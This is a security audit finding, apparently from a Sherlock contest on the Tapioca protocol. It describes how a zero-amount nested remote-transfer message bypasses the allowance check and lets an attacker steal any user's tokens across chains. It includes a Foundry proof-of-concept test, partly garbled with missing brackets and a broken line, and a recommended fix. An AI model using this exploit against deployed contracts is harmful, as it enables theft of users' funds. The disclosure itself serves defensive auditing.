sherlock-audit / 2024-02-tapioca-judging

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ComposableSecurity - Nesting remote transfer messages to steal tokens #136

Closed sherlock-admin4 closed 4 months ago

sherlock-admin4 commented 4 months ago



Nesting remote transfer messages to steal tokens


The user can use a nested MSG_REMOTE_TRANSFER message in a valid MSG_REMOTE_TRANSFER to execute back the remote transfer as the owner of tokens (stealing their tokens). Additionally, the allowance check can be easily bypassed so the attacker can make an unauthorized cross-transfer of any supported token belonging to any user (victim).

Vulnerability Detail

Tapioca allows to execute a cross-chain call to make a remote transfer.

It works as following:

  1. User sends a MSG_REMOTE_TRANSFER message to destination chain with specified amount of tokens and owner of the tokens (e.g. the user themselves).
  2. On the destination chain:
    1. Tapioca transfers tokens from the owner (if the user is allowed to send their tokens) to Tapioca.
    2. Tapioca burns the tokens on destination chain.
    3. Tapioca makes a cross-chain call on behalf of the owner to transfer tokens back to the source chain. The details of this call are kept in the composeMsg field of RemoteTransferMsg struct.

The main issue here is that the _internalRemoteTransferSendPacket function is called with remoteTransferMsg_.owner as the first parameter, which is the _srcChainSender parameter. In other words, the executor or the callback call is the owner (not the user who initiated the process). Additionally, the user can arbitrarily specify the contents of the composeMsg in the MSG_REMOTE_TRANSFER message (step 1). It can have a nested MSG_REMOTE_TRANSFER message that would be called by the owner.

What is more, the attacker is able to bypass the allowance check by simply making the outer MSG_REMOTE_TRANSFER for zero amount. The allowance check for 0 amount always passes and allows to execute the nested MSG_REMOTE_TRANSFER.

Let's explore the attack scenario:

  1. The attacker sends a MSG_REMOTE_TRANSFER message to destination chain with 0 amount of tokens and the victim as the owner of the tokens.
  2. On the destination chain:
    1. Tapioca checks the allowance for the attacker by the victim which passes because the amount is 0.
    2. Tapioca transfers 0 tokens from the victim to Tapioca.
    3. Tapioca burns 0 tokens on destination chain.
    4. Tapioca makes a cross-chain call on behalf of the victim to transfer tokens back to the source chain. This is a nested MSG_REMOTE_TRANSFER message by the victim with the victim as the owner and the balance of the victim as the amount.
      1. Tapioca checks the allowance for the victim by the victim which passes because from == sender.
      2. Tapioca transfers amount of tokens from the victim to Tapioca.
      3. Tapioca burns amount of tokens.
      4. Tapioca makes a simple cross-chain call on behalf of the victim to transfer tokens back (again, to the destination chain) to the attacker's address (specified by the attacker in composeMsg).

See the Proof of Concept:

    function test_remote_malicious_transfer() public {

        // vars
        LZSendParam memory remoteLzSendParam_;
        MessagingFee memory remoteMsgFee_; // Will be used as value for the composed msg

        uint256 maliciousTokenAmount_ = 1.1 ether;
        LZSendParam memory remoteLzSendParam_malicious;
        MessagingFee memory remoteMsgFee_malicious; 
        bytes memory composeMsg_malicious;

         * Setup

            deal(address(aUsdo), address(userB), maliciousTokenAmount_); // Victim needs tokens on chain A

            // Setup malicious callback
            PrepareLzCallReturn memory prepareLzCallReturn1_ = usdoHelper.prepareLzCall( // B->A data
                    dstEid: bEid,
                    recipient: OFTMsgCodec.addressToBytes32(address(userA)),
                    amountToSendLD: maliciousTokenAmount_,
                    minAmountToCreditLD: maliciousTokenAmount_,
                    msgType: SEND,
                    composeMsgData: ComposeMsgData({
                        index: 0,
                        gas: 0,
                        value: 0,
                        data: bytes(""),
                        prevData: bytes(""),
                        prevOptionsData: bytes("")
                    lzReceiveGas: 1_000_000,
                    lzReceiveValue: 0
            remoteLzSendParam_ = prepareLzCallReturn1_.lzSendParam;
            remoteMsgFee_ = prepareLzCallReturn1_.msgFee;

            remoteLzSendParam_.fee.nativeFee += 806;
            remoteMsgFee_.nativeFee += 806;

            // Setup malicious remote transfer
            RemoteTransferMsg memory remoteTransferData =
                RemoteTransferMsg({composeMsg: bytes(""), owner: address(userB), lzSendParam: remoteLzSendParam_});
            bytes memory remoteTransferMsg_ = usdoHelper.buildRemoteTransferMsg(remoteTransferData);

            PrepareLzCallReturn memory prepareLzCallReturn2_ = usdoHelper.prepareLzCall(
                    dstEid: aEid,
                    recipient: OFTMsgCodec.addressToBytes32(userA),
                    amountToSendLD: 0,
                    minAmountToCreditLD: 0,
                    msgType: PT_REMOTE_TRANSFER,
                    composeMsgData: ComposeMsgData({
                        index: 0,
                        gas: 1_000_000,
                        value: uint128(remoteMsgFee_.nativeFee),
                        data: remoteTransferMsg_,
                        prevData: bytes(""),
                        prevOptionsData: bytes("")
                    lzReceiveGas: 1_000_000,
                    lzReceiveValue: 0

            composeMsg_malicious = prepareLzCallReturn2_.composeMsg;


            // @dev `remoteMsgFee_` is to be airdropped on dst to pay for the `remoteTransfer` operation (B->A).
            PrepareLzCallReturn memory prepareLzCallReturn1_ = usdoHelper.prepareLzCall( // B->A data
                    dstEid: aEid,
                    recipient: OFTMsgCodec.addressToBytes32(address(userB)),
                    amountToSendLD: 0,
                    minAmountToCreditLD: 0,
                    msgType: SEND,
                    composeMsgData: ComposeMsgData({
                        index: 0,
                        gas: 0,
                        value: 0,
                        data: bytes(""),
                        prevData: bytes(""),
                        prevOptionsData: bytes("")
                    lzReceiveGas: 1_000_000,
                    lzReceiveValue: 0
            remoteLzSendParam_ = prepareLzCallReturn1_.lzSendParam;
            remoteMsgFee_ = prepareLzCallReturn1_.msgFee;

            remoteLzSendParam_.fee.nativeFee += 806;
            remoteMsgFee_.nativeFee += 806;

         * Actions

        RemoteTransferMsg memory remoteTransferData =
            RemoteTransferMsg({composeMsg: composeMsg_malicious, owner: address(userB), lzSendParam: remoteLzSendParam_});
        bytes memory remoteTransferMsg_ = usdoHelper.buildRemoteTransferMsg(remoteTransferData);

        PrepareLzCallReturn memory prepareLzCallReturn2_ = usdoHelper.prepareLzCall(
                dstEid: bEid,
                recipient: OFTMsgCodec.addressToBytes32(userB),
                amountToSendLD: 0,
                minAmountToCreditLD: 0,
                msgType: PT_REMOTE_TRANSFER,
                composeMsgData: ComposeMsgData({
                    index: 0,
                    gas: 1_500_000,
                    value: uint128(remoteMsgFee_.nativeFee),
                    data: remoteTransferMsg_,
                    prevData: bytes(""),
                    prevOptionsData: bytes("")
                lzReceiveGas: 1_500_000,
                lzReceiveValue: 0

        bytes memory composeMsg_ = prepareLzCallReturn2_.composeMsg;
        bytes memory oftMsgOptions_ = prepareLzCallReturn2_.oftMsgOptions;
        MessagingFee memory msgFee_ = prepareLzCallReturn2_.msgFee;
        LZSendParam memory lzSendParam_ = prepareLzCallReturn2_.lzSendParam;

        assertEq(bUsdo.balanceOf(address(userA)), 0);, msgFee_.nativeFee);
        (MessagingReceipt memory msgReceipt_,) = aUsdo.sendPacket{value: msgFee_.nativeFee}(lzSendParam_, composeMsg_);

            verifyPackets(uint32(bEid), address(bUsdo));

            // Initiate approval
            // bUsdo.approve(address(bUsdo), 0); // Needs to be pre approved on B chain to be able to transfer

                    address(bUsdo), // Compose creator (at lzReceive)
                    address(bUsdo), // Compose receiver (at lzCompose)
                    // address(this),

            verifyPackets(uint32(aEid), address(aUsdo));

                    0x5ad79811938c8bdd48e3513a72d845d4d5258f47b0baa7be1952ae2c2b2fc427,//hardcoded because it is not returned  (it is called internally and the return value is not bubbled up)
                    address(aUsdo), // Compose creator (at lzReceive)
                    address(aUsdo), // Compose receiver (at lzCompose)
                    // address(this),

        // Check arrival
            assertEq(bUsdo.balanceOf(address(userA)), 0);
            verifyPackets(uint32(aEid), address(aUsdo)); // Verify B->A transfer
            assertEq(aUsdo.balanceOf(address(this)), 0);
            verifyPackets(uint32(bEid), address(bUsdo)); // Verify A->B transfer
            assertEq(bUsdo.balanceOf(address(userA)), maliciousTokenAmount_);



HIGH - Theft of any supported token held by any user on any chain.

Code Snippet

Tool used

Manual Review


Validate the compose message to not include nested compose messages or build the callback message from scratch as simple LZ transfer message.

Duplicate of #111

0xRektora commented 4 months ago

Dupe of